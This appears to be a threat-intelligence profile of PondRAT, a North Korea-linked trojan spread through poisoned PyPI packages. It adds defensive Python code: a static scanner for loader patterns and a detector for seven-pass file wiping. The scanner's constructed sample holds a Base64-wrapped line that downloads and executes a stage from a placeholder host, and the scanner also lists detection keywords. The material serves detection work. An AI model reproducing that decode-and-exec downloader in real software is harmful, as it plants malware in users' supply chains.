Mallory
Malware. Used by 3 actors.

PondRAT

PondRAT is a remote access trojan associated with North Korea-linked Lazarus activity. Reporting links it with moderate confidence to the Lazarus sub-cluster tracked as Gleaming Pisces (also known as Citrine Sleet, Labyrinth Chollima, Nickel Academy and UNC4736) and notes overlap with AppleJeus-related tradecraft. Unit 42 described PondRAT as a lighter version of POOLRAT (also tracked as SIMPLESEA).

Unit 42 documented PondRAT being delivered through poisoned Python packages uploaded to PyPI, including real-ids, coloredtxt, beautifultext and minisound. The packages carried an encoded next-stage payload; when executed, it retrieved Linux and macOS builds of the RAT from a remote server and ran them. The lures followed the Operation Dream Job pattern (fake job offers), and the campaign was assessed as targeting developers in order to reach supply-chain vendors and, through them, their customers.

Documented PondRAT capabilities are arbitrary command execution, file upload, file download, and sleeping for a predefined interval.

In later intrusions PondRAT appears as older Lazarus tooling that was subsequently replaced by a more advanced memory-only framework. Fox-IT also noted that the newer tooling overwrites files seven times before deleting them, a secure-deletion routine previously associated with PondRAT and POOLRAT.

On the detection side, public YARA coverage exists for PondRAT, and one Linux approach matches fixed byte sequences (hexadecimal patterns) in the ELF binaries.
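The decode-then-execute loader shape described above (an encoded blob inside a package that is decoded and run, and in turn fetches the real payload) is something you can triage statically before a package ever reaches a build host. The following is an added example, not code from Unit 42, Mallory, or the packages themselves: it walks a package's Python sources with the `ast` module, flags `exec`/`eval`/`compile` applied to decoded or downloaded data, and recursively decodes embedded Base64 stages so a nested downloader is found too. The sample package source, the `_INNER` stage and the `example.invalid` URL are constructed stand-ins, and the function names are assumptions of this example.

```python
"""Static triage for the decode-then-exec loader pattern in a Python package.

Added example, not the code of any real package or vendor. SAMPLE_INIT and
_INNER below are constructed to have the same shape as a poisoned __init__.py;
they are never executed here, only parsed.
"""
import ast
import base64
import os

EXECUTORS = {"exec", "eval", "compile"}
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode",
            "unhexlify", "fromhex", "decompress"}
FETCHERS = {"urlopen", "urlretrieve", "get", "post"}       # urllib / requests style
RUNNERS = {"system", "popen", "Popen", "run", "call", "check_output",
           "execv", "execve", "execl"}


def _callee(node):
    """Short name of the function being called: foo() or module.foo()."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return None


def _calls(node, names):
    """True if any call nested under `node` targets a name in `names`."""
    return any(isinstance(n, ast.Call) and _callee(n) in names for n in ast.walk(node))


def _embedded_stage(s):
    """If `s` is Base64 that decodes to non-empty, parseable Python, return that source."""
    if len(s) < 16:
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
        if not text.strip():
            return None
        ast.parse(text)
        return text
    except Exception:
        return None


def scan_source(src, depth=0, max_depth=3):
    """Return a list of (lineno, finding) for loader-like constructs in `src`.
    Embedded Base64 Python stages are decoded and scanned recursively."""
    findings = []
    tree = ast.parse(src)
    # Names assigned from a decoder call, so `data = b64decode(blob); exec(data)`
    # is caught even though the decode and the exec are on different lines.
    decoded_vars = {
        t.id
        for node in ast.walk(tree)
        if isinstance(node, ast.Assign) and _calls(node.value, DECODERS)
        for t in node.targets if isinstance(t, ast.Name)
    }
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _callee(node)
            arg = node.args[0] if node.args else None
            if name in EXECUTORS and arg is not None:
                if _calls(arg, DECODERS) or (isinstance(arg, ast.Name) and arg.id in decoded_vars):
                    findings.append((node.lineno, f"{name}() on decoded data"))
                elif _calls(arg, FETCHERS):
                    findings.append((node.lineno, f"{name}() on fetched data"))
            elif name in RUNNERS and _calls(node, FETCHERS):
                findings.append((node.lineno, f"{name}() wrapping a network fetch"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and depth < max_depth:
            inner = _embedded_stage(node.value)
            if inner is not None:
                findings.append((node.lineno, "embedded Base64 Python stage"))
                findings.extend((ln, f"stage{depth + 1}: {what}")
                                for ln, what in scan_source(inner, depth + 1, max_depth))
    return findings


def scan_package(root):
    """Scan every .py file under an unpacked sdist/wheel directory."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed second stage: the real one fetched the Linux/macOS RAT; this one
# only illustrates the shape (download, then exec) and is never run.
_INNER = (
    "import urllib.request\n"
    "# constructed stage: fetch a third stage and execute it in memory\n"
    "exec(urllib.request.urlopen('http://example.invalid/stage3').read())\n"
)
# Constructed stand-in for a poisoned __init__.py: Base64 blob decoded into exec().
SAMPLE_INIT = (
    "import base64\n"
    "_blob = " + repr(base64.b64encode(_INNER.encode()).decode()) + "\n"
    "exec(base64.b64decode(_blob))\n"
)
BENIGN = "import json\n\ndef load(path):\n    with open(path) as fh:\n        return json.load(fh)\n"

if __name__ == "__main__":
    for lineno, what in scan_source(SAMPLE_INIT):
        print(f"line {lineno}: {what}")
```

The check is deliberately syntactic (no package is imported or executed), so it is safe to run in CI on untrusted sdists; its false positives are things like legitimately embedded Base64 resources, which a reviewer can dismiss quickly because each finding names the line and the reason.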


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers.

Lazarus

Researchers identified the malware during incident response investigations where older Lazarus tooling, including ThemeForestRAT and PondRAT, had been replaced with a significantly more advanced memory-only framework.

via PolySwarm blog (blog.polyswarm.io)
AppleJeus

In one investigation, we observed that the actor had replaced ThemeForestRAT and PondRAT with a more sophisticated memory-only toolset.

via Fox-IT blog (blog.fox-it.com)
TraderTraitor

Lazarus Group Expands Malware Arsenal With PondRAT, ThemeForestRAT, and RemotePE

via cloudatg insights (cloudatg.com)
MITRE ATT&CK

Techniques & procedures

5 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1195.001 Compromise Software Dependencies and Development Tools (Evidence: 1)

"The attackers behind this campaign uploaded several poisoned Python packages to PyPI..." ... "Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."

T1566.001 Spearphishing Attachment (Evidence: 1)

"Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware."

Defense Evasion

2 techniques
T1070 Indicator Removal (Evidence: 1)
Tactic: Defense Evasion

Before contacting its command-and-control server, it removes security hooks placed by endpoint protection products and disables Windows event tracing, allowing the malware to operate with little or no visibility to defenders.

Caveat: the behavior described here (removal of endpoint-protection hooks, disabling Windows event tracing) is Windows-specific, while the documented PondRAT builds are Linux and macOS. Read it as a property of the associated Lazarus toolset rather than as a confirmed PondRAT capability.

T1070.004 File Deletion (Evidence: 3)
Tactic: Defense Evasion

RemotePE also implements secure file deletion functionality by repeatedly overwriting files seven times prior to deletion, behavior previously associated with Lazarus-linked malware families such as PondRAT and POOLRAT.
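A file that is overwritten in full several times and then unlinked leaves no content to recover, but the sequence itself is a behavioral signature in file telemetry. The following is an added example, not from Fox-IT's or Mallory's reporting: a check over a constructed trace that reports a process wiping a path when it writes from offset 0 at least `passes` times (seven by default) and unlinks the file shortly afterwards. The event schema (`ts`, `pid`, `op`, `path`, `offset`) and the sample events are assumptions standing in for auditd or EDR file telemetry; the trace includes a seven-pass wipe, an append-only log, and a config rewritten over a day so the check's edge cases are visible.

```python
"""Behavioral check for 'overwrite N times, then unlink' secure deletion.

Added example. The event format and SAMPLE_TRACE are constructed; map the
fields onto whatever file telemetry you actually collect.
"""
from collections import defaultdict


def find_wipes(events, passes=7, window=5.0):
    """Return [(pid, path, pass_count)] for files wiped before deletion.

    A 'pass' is a write that starts at offset 0 (each full-file overwrite
    restarts there). `passes` such writes on one path by one process,
    followed by an unlink of that path within `window` seconds of the last
    write, is reported. Appends (growing offsets) never count as passes.
    """
    state = defaultdict(lambda: {"passes": 0, "last_write": None})
    hits = []
    for e in sorted(events, key=lambda e: e["ts"]):
        key = (e["pid"], e["path"])
        s = state[key]
        if e["op"] == "write":
            if e.get("offset", 0) == 0:
                s["passes"] += 1
            s["last_write"] = e["ts"]
        elif e["op"] == "unlink":
            recent = s["last_write"] is not None and e["ts"] - s["last_write"] <= window
            if s["passes"] >= passes and recent:
                hits.append((e["pid"], e["path"], s["passes"]))
            # The path is gone; if it is recreated later, start counting afresh.
            del state[key]
    return hits


def _constructed_trace():
    ev = []
    # pid 4242: seven full overwrites from offset 0, then immediate unlink -> wipe
    for i in range(7):
        ev.append({"ts": 100.0 + i * 0.01, "pid": 4242, "op": "write",
                   "path": "/tmp/.stage", "offset": 0, "len": 4096})
    ev.append({"ts": 100.1, "pid": 4242, "op": "unlink", "path": "/tmp/.stage"})
    # pid 100: append-only log, offsets grow, never deleted -> benign
    for i in range(7):
        ev.append({"ts": 200.0 + i, "pid": 100, "op": "write",
                   "path": "/var/log/app.log", "offset": i * 128, "len": 128})
    # pid 77: config rewritten from offset 0 once an hour, deleted much later -> benign
    for i in range(7):
        ev.append({"ts": 300.0 + i * 3600, "pid": 77, "op": "write",
                   "path": "/etc/app.conf", "offset": 0, "len": 512})
    ev.append({"ts": 300.0 + 7 * 3600 + 600, "pid": 77, "op": "unlink",
               "path": "/etc/app.conf"})
    return ev


SAMPLE_TRACE = _constructed_trace()

if __name__ == "__main__":
    for pid, path, n in find_wipes(SAMPLE_TRACE):
        print(f"pid {pid} wiped {path} with {n} overwrite passes before unlink")
```

The `window` bound is what keeps the repeatedly rewritten config file out of the results; if your telemetry carries file sizes, also require each pass's write length to be at least the file size, which removes partial-rewrite noise without affecting a real seven-pass wipe.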

Command and Control

1 technique
T1071 Application Layer Protocol (Evidence: 1)

"...runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server." ... "the mechanism that handles commands from the [command-and-control server] is nearly identical."

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution (3)

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (5)

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.